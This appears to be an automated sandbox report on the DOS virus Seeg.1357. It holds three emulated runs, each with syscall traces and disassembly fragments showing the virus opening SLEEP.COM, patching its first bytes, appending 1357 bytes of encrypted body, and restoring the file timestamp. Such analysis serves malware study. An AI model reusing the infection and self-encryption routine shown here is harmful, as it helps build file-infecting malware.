
vx.netlux.org/Virus.DOS.Seeg.1357.a

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:25:10.73645848Z 53 PC: 12e3c | Get interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-17T22:25:10.73846879Z 37 PC: 12e4f | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-17T22:25:10.739603185Z 73 PC: 12c81 | Release memory
2018-12-17T22:25:10.741281885Z 72 PC: 12c8e | Allocate memory
2018-12-17T22:25:10.747935539Z 74 PC: 12c9b | Reallocate memory
2018-12-17T22:25:10.749380359Z 72 PC: 12ca3 | Allocate memory
2018-12-17T22:25:10.751122424Z 44 PC: 12cbb | Get time
0x12cbb: cmp dh, 0x22
0x12cbe: jne 0x12cc3
0x12cc0: call 0x12ddc
0x12cc3: call 0x12f02
0x12cc6: lea si, word ptr [bp + 0x2a7]
0x12cca: mov ax, dx
0x12ccc: xor bx, bx
0x12cce: call 0x12e06
0x12cd1: xor ax, 0x1234
0x12cd4: call 0x12e06
0x12cd7: mov ax, word ptr [si]
0x12cd9: xor ah, ah
0x12cdb: mov bl, 2
0x12cdd: div bl
0x12cdf: xor ah, ah
0x12ce1: mov byte ptr [bp + 0x2b6], al
0x12ce5: push si
0x12ce6: lea si, word ptr [bp + 0x249]
0x12cea: call 0x12e7d
0x12ced: pop si
2018-12-17T22:25:10.753710186Z 9 PC: 12de5 | Display string (Could not find end pointer)
2018-12-17T22:25:10.760376746Z 26 PC: 12f23 | Set disk transfer address
2018-12-17T22:25:10.761810154Z 78 PC: 12f2f | Find first file
2018-12-17T22:25:10.768053315Z 67 PC: 12f9a | Get or set file attributes
2018-12-17T22:25:10.784759149Z 61 PC: 12fab | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:25:10.795408408Z 66 PC: 12fbd | Move file pointer
2018-12-17T22:25:10.797074273Z 63 PC: 12fc8 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:25:10.804572167Z 66 PC: 12ff3 | Move file pointer
2018-12-17T22:25:10.806067377Z 64 PC: 12fff | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:25:10.808686898Z 66 PC: 13009 | Move file pointer
2018-12-17T22:25:10.811170913Z 44 PC: 1300d | Get time
0x1300d: push ds
0x1300e: mov cx, 0x2a6
0x13011: mov si, 0x41
0x13014: mov word ptr es:[0x23], dx
0x13019: xor word ptr es:[si], dx
0x1301c: inc si
0x1301d: sub dx, 0xdead
0x13021: inc si
0x13022: loop 0x13019
0x13024: push bx
0x13025: xor ax, ax
0x13027: mov al, byte ptr [bp + 0x2b7]
0x1302b: mov bl, 3
0x1302d: mul bl
0x1302f: add ax, 3
0x13032: mov word ptr [bp + 0x2b8], ax
0x13036: lea si, word ptr [bp + 0x261]
0x1303a: xor di, di
0x1303c: movsb byte ptr es:[di], byte ptr [si]
0x1303d: mov bx, word ptr [bp + 0x233]
2018-12-17T22:25:10.814360379Z 64 PC: 130a5 | Write file or device (Write 13 bytes on handle 5)
2018-12-17T22:25:10.817422019Z 64 PC: 130b0 | Write file or device (Write 1357 bytes on handle 5)
2018-12-17T22:25:10.827951425Z 87 PC: 130c6 | Get or set file date and time
2018-12-17T22:25:10.829732877Z 62 PC: 130ca | Close file
2018-12-17T22:25:10.842117352Z 37 PC: 12e33 | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-17T22:25:10.852816212Z 73 PC: 130d3 | Release memory
2018-12-17T22:25:10.854616862Z 9 PC: 12a4a | Display string (String= ' ������ 䠩�� 320 ���� ')

{"DateBased":false,"Day":0,"Month":0,"Year":0,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":4450,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:51:52.585930286Z 53 PC: 12e3c | Get interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:51:52.587704346Z 37 PC: 12e4f | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:51:52.589659353Z 73 PC: 12c81 | Release memory
2018-12-25T11:51:52.590947494Z 72 PC: 12c8e | Allocate memory
2018-12-25T11:51:52.593050471Z 74 PC: 12c9b | Reallocate memory
2018-12-25T11:51:52.594529054Z 72 PC: 12ca3 | Allocate memory
2018-12-25T11:51:52.596070262Z 44 PC: 12cbb | Get time
0x12cbb: cmp dh, 0x22
0x12cbe: jne 0x12cc3
0x12cc0: call 0x12ddc
0x12cc3: call 0x12f02
0x12cc6: lea si, word ptr [bp + 0x2a7]
0x12cca: mov ax, dx
0x12ccc: xor bx, bx
0x12cce: call 0x12e06
0x12cd1: xor ax, 0x1234
0x12cd4: call 0x12e06
0x12cd7: mov ax, word ptr [si]
0x12cd9: xor ah, ah
0x12cdb: mov bl, 2
0x12cdd: div bl
0x12cdf: xor ah, ah
0x12ce1: mov byte ptr [bp + 0x2b6], al
0x12ce5: push si
0x12ce6: lea si, word ptr [bp + 0x249]
0x12cea: call 0x12e7d
0x12ced: pop si
2018-12-25T11:51:52.598917385Z 26 PC: 12f23 | Set disk transfer address
2018-12-25T11:51:52.60003804Z 78 PC: 12f2f | Find first file
2018-12-25T11:51:52.606356955Z 67 PC: 12f9a | Get or set file attributes
2018-12-25T11:51:52.623446993Z 61 PC: 12fab | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:51:52.630735267Z 66 PC: 12fbd | Move file pointer
2018-12-25T11:51:52.632108427Z 63 PC: 12fc8 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T11:51:52.639098846Z 66 PC: 12ff3 | Move file pointer
2018-12-25T11:51:52.641069345Z 64 PC: 12fff | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:51:52.643807006Z 66 PC: 13009 | Move file pointer
2018-12-25T11:51:52.645186837Z 44 PC: 1300d | Get time
0x1300d: push ds
0x1300e: mov cx, 0x2a6
0x13011: mov si, 0x41
0x13014: mov word ptr es:[0x23], dx
0x13019: xor word ptr es:[si], dx
0x1301c: inc si
0x1301d: sub dx, 0xdead
0x13021: inc si
0x13022: loop 0x13019
0x13024: push bx
0x13025: xor ax, ax
0x13027: mov al, byte ptr [bp + 0x2b7]
0x1302b: mov bl, 3
0x1302d: mul bl
0x1302f: add ax, 3
0x13032: mov word ptr [bp + 0x2b8], ax
0x13036: lea si, word ptr [bp + 0x261]
0x1303a: xor di, di
0x1303c: movsb byte ptr es:[di], byte ptr [si]
0x1303d: mov bx, word ptr [bp + 0x233]
2018-12-25T11:51:52.650011001Z 64 PC: 130a5 | Write file or device (Write 25 bytes on handle 5)
2018-12-25T11:51:52.652840807Z 64 PC: 130b0 | Write file or device (Write 1357 bytes on handle 5)
2018-12-25T11:51:52.66253211Z 87 PC: 130c6 | Get or set file date and time
2018-12-25T11:51:52.664285165Z 62 PC: 130ca | Close file
2018-12-25T11:51:52.672576774Z 37 PC: 12e33 | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:51:52.674047876Z 73 PC: 130d3 | Release memory
2018-12-25T11:51:52.67548121Z 9 PC: 12a4a | Display string (String= ' ������ 䠩�� 320 ���� ')

{"DateBased":false,"Day":0,"Month":0,"Year":0,"Hour":0,"Min":0,"Second":34,"TimeBased":true,"OriginalID":4450,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:51:52.623820977Z 53 PC: 12e3c | Get interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:51:52.625423295Z 37 PC: 12e4f | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:51:52.626539462Z 73 PC: 12c81 | Release memory
2018-12-25T11:51:52.627890823Z 72 PC: 12c8e | Allocate memory
2018-12-25T11:51:52.629951888Z 74 PC: 12c9b | Reallocate memory
2018-12-25T11:51:52.631396504Z 72 PC: 12ca3 | Allocate memory
2018-12-25T11:51:52.633148505Z 44 PC: 12cbb | Get time
0x12cbb: cmp dh, 0x22
0x12cbe: jne 0x12cc3
0x12cc0: call 0x12ddc
0x12cc3: call 0x12f02
0x12cc6: lea si, word ptr [bp + 0x2a7]
0x12cca: mov ax, dx
0x12ccc: xor bx, bx
0x12cce: call 0x12e06
0x12cd1: xor ax, 0x1234
0x12cd4: call 0x12e06
0x12cd7: mov ax, word ptr [si]
0x12cd9: xor ah, ah
0x12cdb: mov bl, 2
0x12cdd: div bl
0x12cdf: xor ah, ah
0x12ce1: mov byte ptr [bp + 0x2b6], al
0x12ce5: push si
0x12ce6: lea si, word ptr [bp + 0x249]
0x12cea: call 0x12e7d
0x12ced: pop si
2018-12-25T11:51:52.63599271Z 26 PC: 12f23 | Set disk transfer address
2018-12-25T11:51:52.637491435Z 78 PC: 12f2f | Find first file
2018-12-25T11:51:52.6440933Z 67 PC: 12f9a | Get or set file attributes
2018-12-25T11:51:52.661246952Z 61 PC: 12fab | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:51:52.668568258Z 66 PC: 12fbd | Move file pointer
2018-12-25T11:51:52.669528874Z 63 PC: 12fc8 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T11:51:52.6741078Z 66 PC: 12ff3 | Move file pointer
2018-12-25T11:51:52.67548683Z 64 PC: 12fff | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:51:52.677309574Z 66 PC: 13009 | Move file pointer
2018-12-25T11:51:52.678303391Z 44 PC: 1300d | Get time
0x1300d: push ds
0x1300e: mov cx, 0x2a6
0x13011: mov si, 0x41
0x13014: mov word ptr es:[0x23], dx
0x13019: xor word ptr es:[si], dx
0x1301c: inc si
0x1301d: sub dx, 0xdead
0x13021: inc si
0x13022: loop 0x13019
0x13024: push bx
0x13025: xor ax, ax
0x13027: mov al, byte ptr [bp + 0x2b7]
0x1302b: mov bl, 3
0x1302d: mul bl
0x1302f: add ax, 3
0x13032: mov word ptr [bp + 0x2b8], ax
0x13036: lea si, word ptr [bp + 0x261]
0x1303a: xor di, di
0x1303c: movsb byte ptr es:[di], byte ptr [si]
0x1303d: mov bx, word ptr [bp + 0x233]
2018-12-25T11:51:52.681045994Z 64 PC: 130a5 | Write file or device (Write 16 bytes on handle 5)
2018-12-25T11:51:52.682892842Z 64 PC: 130b0 | Write file or device (Write 1357 bytes on handle 5)
2018-12-25T11:51:52.695153375Z 87 PC: 130c6 | Get or set file date and time
2018-12-25T11:51:52.696875479Z 62 PC: 130ca | Close file
2018-12-25T11:51:52.70511912Z 37 PC: 12e33 | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:51:52.706272675Z 73 PC: 130d3 | Release memory
2018-12-25T11:51:52.708447289Z 9 PC: 12a4a | Display string (String= ' ������ 䠩�� 320 ���� ')